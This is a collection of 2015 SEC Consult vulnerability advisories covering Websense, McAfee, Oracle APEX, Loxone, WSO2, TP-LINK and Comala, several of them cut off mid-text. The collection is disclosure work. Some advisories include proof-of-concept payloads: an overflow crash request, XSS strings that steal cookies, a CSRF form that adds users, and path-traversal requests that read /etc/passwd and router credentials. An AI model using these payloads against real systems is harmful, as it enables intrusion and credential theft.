-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150805-0 === title: Stack buffer overflow in handle_debug_network product: Websense Triton Content Manager vulnerable version: 8.0.0 build 1165 fixed version: V8.0.0 HF02 CVE number: CVE-2015-5718 impact: high homepage: www.websense.com found: 2015-04-13 by: C. Schwarz (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web proxy and cache that provides real-time content scanning and Web site classification to protect network computers from malicious Web content while controlling employee access to dynamic, user-generated Web 2.0 content. Web content has evolved from a static information source to a sophisticated platform for 2-way communications, which can be a valuable productivity tool when adequately secured. URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx Business recommendation: - Attackers are able to completely compromise the Websense Content Manager with combined targeted attack vectors. The scope of the test, where the vulnerabilities have been identified, was a very short crash-test of the application. It is assumed that further vulnerabilities exist within this product. Vulnerability overview/description: - --- A stack-based buffer overflow was identified in the Websense Content Manager administrative interface, which allows to write past the 512 bytes sized buffer dest when calling strcpy in handle_debug_network. The vulnerability can be used in combination with a CSRF attack to crash the system or execute arbitrary code. Proof of concept: - - A single HTTP request is sufficient to crash the content_manager binary application: POST /submit_net_debug.cgi?mode=0menu=0item=4tab=1 HTTP/1.1 Host: content gateway:8081 [...] Content-Length: 869 record_version=10479%3A70submit_from_page=%2Fmonitor%2Fm_net_debug.inkcmd_name=1cmd_param=[Ax2048]cmd_status=0troute_install=0tdump_install=0cmd_action=1cate=pingcate=asdapply=apply Below is the GDB output of the process memory, most of the CPU's registers including the stack pointer of various previous frames are overwritten with the value of 'A'. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f122b073700 (LWP 50174)] 0x006becb1 in handle_debug_network (whc=value optimized out, tag=value optimized out, arg=value optimized out) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 997 /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory. in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc (gdb) i r rax0x0 0 rbx0x4141414141414141 4702111234474983745 rcx0x125c0 75200 rdx0xda3f 55871 rsi0x354136055841632 rdi0x1 1 rbp0x4141414141414141 0x4141414141414141 rsp0x7f122b070618 0x7f122b070618 r8 0x4141414141414141 4702111234474983745 r9 0x4141414141414141 4702111234474983745 r100x4141414141414141 4702111234474983745 r110x3f2c35a350 271324652368 r120x4141414141414141 4702111234474983745 r130x4141414141414141 4702111234474983745 r140x4141414141414141 4702111234474983745 r150x4141414141414141 4702111234474983745 rip0x6becb1 0x6becb1 handle_debug_network(WebHttpContext*, char const*, char*)+561 eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) bt #0 0x006becb1 in handle_debug_network (whc=value optimized out, tag=value optimized out, arg=value optimized out) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 #1 0x4141414141414141 in ?? () #2 0x4141414141414141 in ?? () #3 0x4141414141414141 in ?? () #4 0x4141414141414141 in ?? () #5 0x4141414141414141 in ?? () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () #9 0x4141414141414141 in ?? () #10 0x4141414141414141
SEC Consult SA-20150728-0 :: McAfee Application Control Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150728-0 === title: McAfee Application Control Multiple Vulnerabilities product: McAfee Application Control vulnerable version: verified in version 6.1.3.353 fixed version: a fixed version is currently not available impact: high homepage: www.mcafee.com/us/products/application-control.aspx found: 28.04.2015 by: R. Freingruber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- McAfee Application Control software provides an effective way to block unauthorized applications and code on servers, corporate desktops, and fixed-function devices. This centrally managed whitelisting solution uses a dynamic trust model and innovative security features that thwart advanced persistent threats — without requiring signature updates or labor-intensive list management. Source: http://www.mcafee.com/us/products/application-control.aspx Business recommendation: - By combining the vulnerabilities documented in this advisory an attacker can completely bypass the mitigations provided by McAfee Application Control. This especially includes the application whitelisting as well as the read and write protections. Moreover, an attacker can attack the availability of the system. SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: - --- 1) Injected library bypasses protections of the operating system To add memory corruption protections (mp, mp-casp, mp-vasr, mp-vasr-forced-relocation) McAfee Application Control injects it's own library scinject.dll into all running processes. The library allocates a write- and executable location which can be used to bypass the mitigation technique Data Execution Protection (DEP) of the underlying operating system. Moreover, it can also be used to bypass the mitigation technique mp-casp from McAfee Application Control. This increases the possibility to successfully exploit a memory corruption vulnerability. Since memory corruption vulnerabilities can be used to compromise a system and to bypass the application whitelisting protection it is very important to not decrease the security of protections provided by the operating system. 2) Software shipped with an application from 1999 which includes publicly known vulnerabilities McAfee Application Control installs per default a ZIP application from 1999. The ZIP application contains publicly known vulnerabilities including a buffer overflow. An attacker can exploit the buffer overflow vulnerability to bypass application whitelisting. However, a public exploit is not available and exploitation of the vulnerability is considered not trivial. 3) Multiple kernel driver vulnerabilities An attacker can send manipulated IOCTL requests to the kernel which lead to a system crash. These vulnerabilities can be used to affect the availability of the system. It is expected that these vulnerabilities can also be used to escalate privileges to kernel level. 4) Insufficient application whitelisting protection The main feature of McAfee Application Control is application whitelisting. SEC Consult Vulnerability Lab discovered multiple ways to bypass this protection. 5) Insufficient file system read-/write-protection Because of the design of McAfee Application Control write protection is mandatory to ensure the security of application whitelisting. SEC Consult managed to bypass the write protection to overwrite whitelisted applications to achieve full code execution. Moreover, read protection was bypassed to dump the contents of McAfee's password file. By bypassing write protection it's also possible to delete the password file to interact with McAfee Application Control without requiring a password. This can be used to completely disable McAfee Application Control. Proof of concept: - - Since no fix is available for any of the described vulnerabilities, the proof of concept section was completely removed from the advisory. Vulnerable / tested versions: - - The version 6.1.3.353 was found to be vulnerable. This was the latest version at the time of discovery. Vendor contact timeline: - 2015-06-03: Contacting vendor through security-ale...@mcafee.com
SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150716-0 === title: Permanent Cross-Site Scripting product: Oracle Application Express vulnerable version: All versions prior to 4.2.3.00.08 fixed version: 4.2.3.00.08 CVE number: CVE-2015-2655 impact: high homepage: https://apex.oracle.com/i/index.html found: 2014-05-28 by: F. Lukavsky SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- Oracle Application Express (Oracle APEX) is Oracle's primary tool for developing Web applications with SQL and PL/SQL. Using only a web browser, you can develop and deploy professional Web-based applications for desktops and mobile devices. It is a fully supported, no cost option of the Oracle Database, and is installed by default in all editions of the Oracle Database. Even those without SQL and PL/SQL knowledge, can still easily install the many built-in packaged applications, such as Survey Builder, Customer Tracker, and P-Track (for tracking projects). http://www.oracle.com/technetwork/developer-tools/apex/overview/index.html Vulnerability overview/description: - --- The gReport Controls Sort Widget is prone to permanent Cross-Site Scripting. The setting display as of the column attributes is ignored for the filter list. Proof of concept: - - Adding the following field to a table will cause an alertbox to display the currently set cookies as soon as the sort options are selected for the column: xss-entryimg src=x onerror=alert(document.cookie) Vulnerable / tested versions: - - All versions prior to 4.2.3.00.08 Vendor contact timeline: - 2014-08-13: Contacting vendor through secalert...@oracle.com 2014-08-14: Vendor response - vulnerbility will be investigated 2014-08-15: Vendor response - issue will be tracked as S0484336 2014-08-22: Status update: Under investigation / Being fixed in main codeline 2014-09-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-10-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-11-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-12-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-01-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-02-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-03-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-04-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-05-23: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-06-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-07-11: Issue is fixed in upcoming CPU, patches will be released on 2015-07-14 2015-07-16: Coordinated release of the security advisory Solution: - - Upgrade to Oracle Application Express 4.2.3.00.08. Workaround: - --- Refrain from using the gReport Controls Sort Widget. Advisory URL: - - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com
SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)
SEC Consult Vulnerability Lab Security Advisory 20150514-0 === title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware version 6.4.5.12 fixed version: 6.4.5.12 impact: Critical homepage: http://www.loxone.com found: 2015-03-12 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor product description: - Loxone Electronics was founded in 2009. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone. URL: http://www.loxone.com/enus/company/about-us.html Business recommendation: Most of the issues previously identified (see SEC Consult security advisory SA-20150227-0) seem not to have been fixed properly and are still exploitable either directly or by easily bypassing implemented measures. A very short crash-test of only a few hours even resulted in new vulnerabilities. The Loxone smart home has multiple design and implementation flaws which combined could be used by an attacker to: 1) remotely cause a denial of service condition which renders the smart home unusable which would effectively disable any Loxone-controlled alarm system, 2) steal the user's credentials for the management interface and fully control the smart home, 3) execute JavaScript code in the user's browser for further attacks, 4) control arbitrary devices connected to the system, e.g. switch on/off lights, remotely open doors or garages, disable alarm system, etc., 5) gain access to admin passwords of Loxone partners (e.g. electricians who are implementing the smart home solution at customers) and completely take over other smart homes of the same Loxone partner! It is recommended by SEC Consult not to use this smart home system until a thorough security analysis (white box) of all components has been performed by security professionals, as a very short crash test (Blackbox) already resulted in critical vulnerabilities. Vulnerability overview/description: --- 1) Cross-site request-forgery (XSRF) The system is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could control arbitrary functions within the smart home system. All functions can be controlled via web based commands, e.g. in order to switch on lights, remotely open doors or garages, disable the alarm system, etc. This can still be exploited in the current Loxone version and it does not seem to be fixed properly. 2) HTTP Response Splitting / Header injection The web server of the Loxone smart home system is vulnerable to HTTP response splitting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could arbitrarily manipulate the server's response (e.g. injection of JavaScript code). This can still be exploited in the current Loxone version and it does not seem to be fixed properly. The implemented measures/filters can be easily bypassed using double-encoded payloads. This attack is not limited to the admin interface, it can be exploited in any path of the webserver. SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers. 3) Reflected cross-site scripting (XSS) vulnerability The web interface of Loxone smart home is vulnerable to reflected cross-site scripting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could execute arbitrary JavaScript code in the user's browser. Thereby he could steal the user's credentials or control arbitrary devices within the smart home system. To exploit this vulnerability it isn't mandatory for the user to be authenticated. Unauthenticated XSS vulnerabilities exist as well (by exploiting the HTTP Response Splitting vulnerability described in 2) as authenticated ones. SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers. 4) Denial of service An attacker could perform a denial of service attack with simple measures, such as synflood attacks. During such an attack the system isn't accessible via the network and can't be controlled
SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150513-0 === title: Multiple critical vulnerabilities product: WSO2 Identity Server other WSO2 Carbon based products may be affected too vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095) fixed version: 5.0.0 with patches 1194 and 1095 applied CVE number: impact: critical homepage: http://wso2.com/products/identity-server/ found: 2015-02-19 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- WSO2 Identity Server provides sophisticated security and identity management of enterprise web applications, services, and APIs, and makes life easier for developers and architects with its hassle-free, minimal monitoring and maintenance requirements. In its latest version, Identity Server acts as an Enterprise Identity Bus (EIB) — a central backbone to connect and manage multiple identities regardless of the standards on which they are based. URL: http://wso2.com/products/identity-server/ Business recommendation: - The WSO2 Identity Server has three security vulnerabilities that allow an attacker to take over administrative user sessions and read arbitrary local files. Moreover, the XXE vulnerability potentially allows an attacker to conduct further attacks on internal servers since the vulnerability may allow an attacker to bypass firewall rules. SEC Consult only conducted a very quick and narrow check on the WSO2 Identity Server. Since in this check a critical vulnerability was found, SEC Consult suspects that the Identity Server contains even more critical vulnerabilities. Since other WSO2 products are based on the same framework (WSO2 Carbon Framework), it is possible that these or similar vulnerabilities affect other products too. SEC Consult recommends to not use any products based on the WSO2 Carbon Framework until a thorough security review has been conducted. Vulnerability overview/description: - --- 1) Reflected cross-site scripting (XSS, IDENTITY-3280) The WSO2 Identity Server is vulnerable to reflected reflected cross-site scripting vulnerabilities. An attacker can lure a victim, that is logged in on the Identity Server administration web interface, to e.g. click on a link and take over the victim's session. 2) Cross-site request forgery (CSRF, IDENTITY-3280) On at least on one web page, CSRF protection has not been implemented. An attacker on the internet could lure a victim, that is logged in on the Identity Server administration web interface, on a web page e.g. containing a manipulated img tag. The attacker is then able to add arbitrary users to the Identity Server. 3) XML external entitiy injection (XXE, IDENTITY-3192) An unauthenticated attacker can use the SAML authentication interface to inject arbitrary external XML entities. This allows an attacker to read arbitrary local files. Moreover, since the XML entity resolver allows remote URLs, this vulnerability may allow to bypass firewall rules and conduct further attacks on internal hosts. Proof of concept: - - 1) Reflected cross-site scripting (XSS, IDENTITY-3280) When opening the following URL an alert-box is shown as an example: http://host:9443/carbon/user/change-passwd.jsp?isUserChange=truereturnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E When a user without permission to create other users issues the following request, an alert-box is shown: - snip POST /carbon/user/add-finish.jsp HTTP/1.1 Host: host:9443 Cookie: cookies Content-Type: application/x-www-form-urlencoded Content-Length: 261 pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24domain=PRIMARYusername=secconsultpasswordMethod=defineHerepassword=test123retype=test123 - snip 2) Cross-site request forgery (CSRF, IDENTITY-3280) The following HTML fragment demonstrates this issue: - snip form method=POST action=https://host:9443/carbon/user/add-finish.jsp input type=text name=domain value=PRIMARY/ input type=text name=username value=secconsult/ input type=text name=password value=test123/ input type=submit/ /form - snip 3) XML external entitiy injection (XXE, IDENTITY-3192) After issuing the following request to a vulnerable Windows server
SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)
SEC Consult Vulnerability Lab Security Advisory 20150410-0 === title: Unauthenticated Local File Disclosure product: Multiple TP-LINK products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: see Solution CVE number: CVE-2015-3035 impact: Critical homepage: http://tp-link.com found: 2015-02-19 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- TP-LINK is a global provider of SOHO SMB networking products and the World's No.1 provider of WLAN products, with products available in over 120 countries to tens of millions customers. Committed to intensive RD, efficient production and strict quality management, TP-LINK continues to provide award-winning networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline Adapters, Print Servers, Media Converters and Network Adapters for Global end-users. Source: http://www.tp-link.us/about/?categoryid=102 Business recommendation: Attackers can read sensitive configuration files without prior authentication. These files e.g. include the administrator credentials and the WPA passphrase. TP-LINK has provided fixed firmware which should be installed immediately. Vulnerability overview/description: --- Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: - The following HTTP request shows how directory traversal can be used to gain access to files without prior authentication: === GET /login/../../../etc/passwd HTTP/1.1 Host: $host === The server response includes the contents of the file: === HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm=TP-LINK Wireless Dual Band Gigabit Router WDR4300 Content-Length: 683 Content-Type: text/html root:x:0:0:root:/root:/bin/sh Admin:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ap71:x:500:0:Linux User,,,:/root:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh admin:x:500:500:admin:/home:/bin/sh guest:x:500:500:guest:/home:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh === Several sensitive files can be read. These include: Files containing Wi-Fi configuration including WPA-passphrase: /login/../../../tmp/ath.ap_bss /login/../../../tmp/ath1.ap_bss A file containing administrator credentials (format: $user:md5($password), which can be brute-forced very efficiently: /login/../../../tmp/dropbear/dropbearpwd Example server response: === HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm=TP-LINK Wireless Dual Band Gigabit Router WDR4300 Content-Length: 56 Content-Type: text/html username:admin password:11d0fc2ff3e7862d8a3f9b280e6d390c === Vulnerable / tested versions: - The vulnerability affects the following products: TP-LINK Archer C5 (Hardware version 1.2) TP-LINK Archer C7 (Hardware version 2.0) TP-LINK Archer C8 (Hardware version 1.0) TP-LINK Archer C9 (Hardware version 1.0) TP-LINK TL-WDR3500 (Hardware version 1.0) TP-LINK TL-WDR3600 (Hardware version 1.0) TP-LINK TL-WDR4300 (Hardware version 1.0) TP-LINK TL-WR740N (Hardware version 5.0) TP-LINK TL-WR741ND (Hardware version 5.0) TP-LINK TL-WR841N (Hardware version 9.0) TP-LINK TL-WR841N (Hardware version 10.0) TP-LINK TL-WR841ND (Hardware version 9.0) TP-LINK TL-WR841ND (Hardware version 10.0) Vendor contact timeline: 2015-02-19
SEC Consult SA-20150409-0 :: Multiple XSS XSRF vulnerabilities in Comalatech Comala Workflows
SEC Consult Vulnerability Lab Security Advisory 20150409-0 === title: Multiple XSS XSRF vulnerabilities product: Comalatech Comala Workflows vulnerable version: = 4.6.1 fixed version: 4.6.2 for Confluence 5.4+ and 4.5.4 for Confluence 4.3+ impact: High homepage: https://marketplace.atlassian.com/plugins/com.comalatech.workflow found: 2015-02-16 by: J. Krautwald (Office Berlin) M. Niederwieser (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor product description: - Build your Confluence content your own way through Comala Workflows approvals, tasks, notifications and workflows. Set customized workflows to create, review, approve and publish your content. Assign page reviewers Create team tasks Publish approved content Manage your documentation stages Use Comala Workflows for: Quality Management, Standards Compliance, Technical Documentation, Editorial Publishing Source: https://marketplace.atlassian.com/plugins/com.comalatech.workflow Business recommendation: Comala Workflows suffers from multiple vulnerabilities due to improper input and output validation. By exploiting these vulnerabilities an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. Vulnerability overview/description: --- 1. Multiple cross-site scripting issues Comala Workflows suffers from multiple reflective stored cross-site scripting vulnerabilities, which allow an attacker to steal other user's sessions, to impersonate other users and to gain unauthorized access to documents hosted in the Confluence instance where the Workflows module is embedded. There are many parameters which are not properly sanitized and thus are vulnerable to XSS. 2. Cross-site request forgery vulnerabilities Comala Workflows does not implement the use of shared secrets (tokens) to prevent cross-site request forgery (XSRF) attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could manipulate data or automatically inject XSS payloads to attack other users. Proof of concept: - 1. Multiple cross-site scripting issues a) The input parameters for giving a workflow a name, appending a label to a given workflow, or adding a new task for a given state are not properly sanitized and thus susceptible to reflected cross-site scripting. The hereby affected scripts alongside the vulnerable GET parameters are: Script GET Parameter(s) saveproperties.actionnewLabelName, newWorkflowName newtask.action taskName When editing an existing workflow via the Markup functionality (accessible via the workflowMarkup POST parameter of /plugins/approvalsworkflow/saveworkflowmarkup.action) the attachment-macro is also susceptible to reflected cross-site scripting. b) When editing an existing workflow via the Markup functionality (accessible via the workflowMarkup POST parameter of /plugins/approvalsworkflow/saveworkflowmarkup.action) the workflow element task does not sanitize the given input and is thus susceptible to cross-site scripting. The application does not sanitize the given input before printing it to the Page Activity popup which leads to the execution of the permanently injected script. When assigning such a task to a co-worker, an e-mail containing the actual payload is sent to the assigned person and when opening the My Comala Workflow Tasks, Page Activity, or Page Activity Macro page, it gets executed. 2. Cross-site request forgery vulnerabilities The /plugins/approvalsworkflow/saveworkflowmarkup.action script for editing an existing workflow via the Markup functionality, for example, is susceptible to cross-site request forgery. If an attacker knows a valid project name (key parameter) and the corresponding workflow name (workflowName parameter), she might exploit this vulnerability to set the Markup code of the workflow to an arbitrary value (e.g. a XSS payload via the task element, see 1. b)). Vulnerable / tested versions: - The vulnerabilities have been verified to exist in up to and including version 4.6.1. Vendor contact timeline: 2015-03-17: Contacted vendor through email 2015-03-18: Vendor confirmed
SEC Consult SA-20150227-0 :: Multiple vulnerabilities in Loxone Smart Home
SEC Consult Vulnerability Lab Security Advisory 20150227-0 === title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware: 5.49; Android-App: 3.4.1 fixed version: 6.3 impact: High homepage: http://www.loxone.com found: 2014-07-02 by: Daniel Schwarz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com Manuel Deticek, Alexander Inführ, Robert Pölzelbauer FH-St.Pölten - Institut für IT Sicherheitsforschung http://www.fhstp.ac.at === Vendor product description: - Loxone Electronics was founded in 2008. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone. URL: http://www.loxone.com/enus/company/about-us.html The Loxone Smart Home gives the owner full control of every device or task using a wall switch, phone or smart tablet. Control and automte areas such as: Lighting, Climate, Security, Audio/Video, Shading, and event Pool and irrigation systems. Your system will adapt all areas of your home providing complete smart home automation. URL: http://www.loxone.com/enus/smart-home/overview.html Business recommendation: The Loxone Smart Home has multiple design and implementation flaws which could be used by an attacker to: 1) cause a denial of service, 2) steal the user's credentials, 3) execute JavaScript code in the user's browser or 4) control arbitrary devices connected to the system. It is recommended by SEC Consult not to use this system until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Unencrypted data-transmission All available communication is unencrypted and could therefore get intercepted and manipulated by a man-in-the-middle attacker. This enables an attacker to control every device within the smart home system. Furthermore a plaintext authentication mechanism is supported which enables an attacker to steal user-credentials. 2) Missing state-of-the-art http-header The http-headers set doesn't comply with the current state-of-the-art. Therefore it is possible to embed the webinterface within an iframe and misuse it for phishing attacks. Furthermore no CSP-Headers are set in order to prevent cross-site scripting attacks. 3) Cross-site request-forgery (XSRF) The system is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could control arbitrary devices within the smart home system. 4) HTTP Response Splitting The backend of the smart home system is vulnerable to HTTP response splitting attacks. If an attacker is able to lure a user into clicking a crafted link he could arbitrarily manipulate the server's response (e.g. injection of JavaScript code). 5) Multiple reflected cross-site scripting (XSS) vulnerabilities The admin webinterface of Loxone Smart Home is vulnerable to multiple reflected cross-site scripting attacks. If an attacker is able to lure a user into clicking a crafted link he could execute arbitrary JavaScript-code in the user's browser. Thereby he could steal the user's credentials or control arbitrary devices within the smart home system. To exploit this vulnerability it isn't mandatory for the user to be authenticated. Unauthenticated XSS vulnerabilities exist as well (by exploiting the HTTP Response Splitting vulnerability described in 4) as authenticated ones. 6) Stored cross-site scripting vulnerability Beside the already mentioned reflected XSS vulnerabilities the Loxone Smart Home System also contains a stored XSS vulnerability. An authenticated attacker is able to persistently inject JavaScript code in the user webinterface. This code gets executed in the context of other users at every login as well as by calling a certain functionality of the webinterface. The injection of the code itself could either be done via the webinterface or could also be conducted through the already mentioned XSRF vulnerability. Therefore it is not necessary for the attacker to login explicitly. After circumventing some filtering-obstacles an attacker for example could be able to automatically disable a connected alarm-system everyday at midnight. 7) Insecure storage of credentials